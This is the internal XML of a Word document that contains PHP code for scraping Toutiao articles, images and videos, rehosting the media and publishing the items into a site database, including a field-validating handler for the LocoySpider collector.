    <w:p w14:paraId="7CC1FE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395BD4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12F15F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50FA94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lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38215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itle']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174D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gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2516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s){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD612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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84C9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173E9B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EC2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8E03C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不存在标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F7C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690181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C478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user_id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150B8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10B738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5FFB59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this-&gt;user_info($v['user_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A75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573146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g']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B0D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ame'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E04B3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7567E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2DC49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E2AF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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15766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9A17F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v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A5A7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451D43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EC1C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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10A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content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E90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content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11303D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02A3B9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5E1BB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image']            =           $this-&gt;qiniu($v['img']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DFFA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v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D2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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251984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images'] as $k =&gt; $v) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E83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this-&gt;qiniu($v['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE006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_text']=$v['img_text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F561E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75CDE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img[$k]['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76350C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2DA5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2E3F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g);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F377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3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3263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video_data'] || !$v['video_data']['video_url']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F31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视频模式视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DBBF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45E2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C195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_data']['video_url'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9EDC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this-&gt;qiniu($v['video_data']['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C86DA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7A8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v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43053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ource']             =           $v['source'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED9E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v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE31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v['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01117F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v['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763A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65F3F0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                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5947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2E194A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utiao_tiemId']     =           $v['item_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4814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             =           $typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751FB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5F2826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id.']'.$data['title']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259A7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646AC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F611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DB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ser_info($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D672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toutiao/user_id?id=".$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76053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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42136F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json_decode($html,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9CB1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C4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2452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catename($name,$typename=''){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F36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7E93F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ews';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E358C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7680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news_others'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D88B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ews';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE34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218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outiao_name'] = $name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300AE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typeid')-&gt;where($where)-&gt;whereOr('title',$name)-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3A0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680311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ime=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CEB8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typename ? $typename : $name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D941C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sdefault']=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628D6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time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE36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pdate_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216E7D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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E115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des']=50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F769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outiao_name']=$name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659BC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b::name('typeid')-&gt;insertGetId($where);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA7D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66C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ata;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E157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EE0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outiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B51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5E950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toutiao/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167ECA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true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B50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 return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FBC6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210842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54E2A6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lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C3D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title']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E918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gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F2A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s){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BAEC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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505E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FC4A7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4F56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CBDDE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不存在标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10AD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49E0E4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BD4A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user_id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE877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34383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nput('img')){$this-&gt;huochetou(input('img_data'));continue;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D21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004A9B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this-&gt;user_info($v['user_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492DC6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7C121B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g']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA5F3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ame'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427AA3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empty($userInfo['qianming']) ? $userInfo['qianming'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD76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4C2932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3700F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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D050D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5D52B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v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE1E5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5E32D2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BB20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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA0F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content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64ED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content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE58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79B71C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0C50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image']            =           $this-&gt;qiniu($v['img']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7EE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this-&gt;_html_content($v['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6E9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2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B593C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images'] as $k =&gt; $v) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19856A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this-&gt;qiniu($v['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E42AB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_text']=$v['img_text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB91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2E6574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img[$k]['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052DB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2593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A48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g);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7473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3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078CA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video_data'] || !$v['video_data']['video_url']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10C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视频模式视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA9E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C9F5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53BF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_data']['video_url'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E95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this-&gt;qiniu($v['video_data']['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B32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D5536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v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69232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ource']             =           $v['source'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C97B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v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D844B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v['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774C34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v['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418548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312D6C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                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC8D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14B24A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utiao_tiemId']     =           $v['item_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0A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tag'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DD1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this-&gt;catename($v['tag']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590EA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2110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news';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469379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B5FE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3AFED1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id.$data['title']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB9FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C9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toutiao_ping($id,$v['group_id'],$v['item_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F207C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51E1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374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html_content($article){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6C39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g_match_all("/src=\"(.*?)\"/", $article,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE985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5FBBAF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img[1] as $k  =&gt;  $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54E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1=$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFAE8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2=$this-&gt;qiniu($img_1,'article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC8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_1 &amp;&amp; $img_2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A890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str_replace($img_1,$img_2,$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C469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FF6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3547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902C0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rticle=preg_replace("/(img_width.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EB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img_height.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE1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onerror.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660EA7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inline.*?)\"(.*?)\"/si","",$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4458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p.*?)&gt;/si","&lt;p&gt;",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FFD0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figure.*?)&gt;/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB55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lt;(\/?a.*?)&gt;/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E389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data.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA040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width.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD82A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alt.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0FD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ticle=preg_replace("/(style.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A372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article;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A40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F752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huochetou($data=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1703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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F79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input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE04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8443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pwd';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD7B7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5DAA50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发布密码请在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>caiji.php</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件源码查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E3FC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50A2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__name__';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276E9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16E429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具体请看数据表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A5F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E12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title';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E32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6751F4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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2761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7CB16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des';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523E6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6D4095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排序（必填，默认</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即可）</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C164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29EA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uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A226F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660A3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请在后台，用户管理查看用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314276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CA2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Db::name('member')-&gt;find($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E624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0BC1E6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请在后台，用户管理查看用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C686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32C2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mychannel';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CC6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5B3BBF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频道模型，具体请看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mychannel</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表（必填）</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2CF0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1628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hide';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A21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1DC29B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隐藏状态，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必须）</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD3F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81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create_time';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06E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16D74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name.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填，发布时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF12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56CE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update_time';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E60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78D7E9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name.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填，修改时间</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E179B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BF5C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mage';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FA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amp;&amp; $data[$name]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5393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name] = $this-&gt;qiniu($data[$name]); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EC6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E6D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mychannel'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F65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content';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3E7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7F9DF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mychannel=1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A2F8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2806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 $this-&gt;_html_content($data['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689C0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ychannel'] == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB0CB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mages';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4287E2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71FBA1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mychannel=2</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7903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81E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 = json_decode($data['images'],true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104D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images'] as $k =&gt; $v) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D01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this-&gt;qiniu($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF284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k]['img_text']='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBFEC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6CD01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image';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BBDB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amp;&amp; !$data[$name]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EF6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img[$k]['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ABA1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6872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903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DB2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g);</w:t>
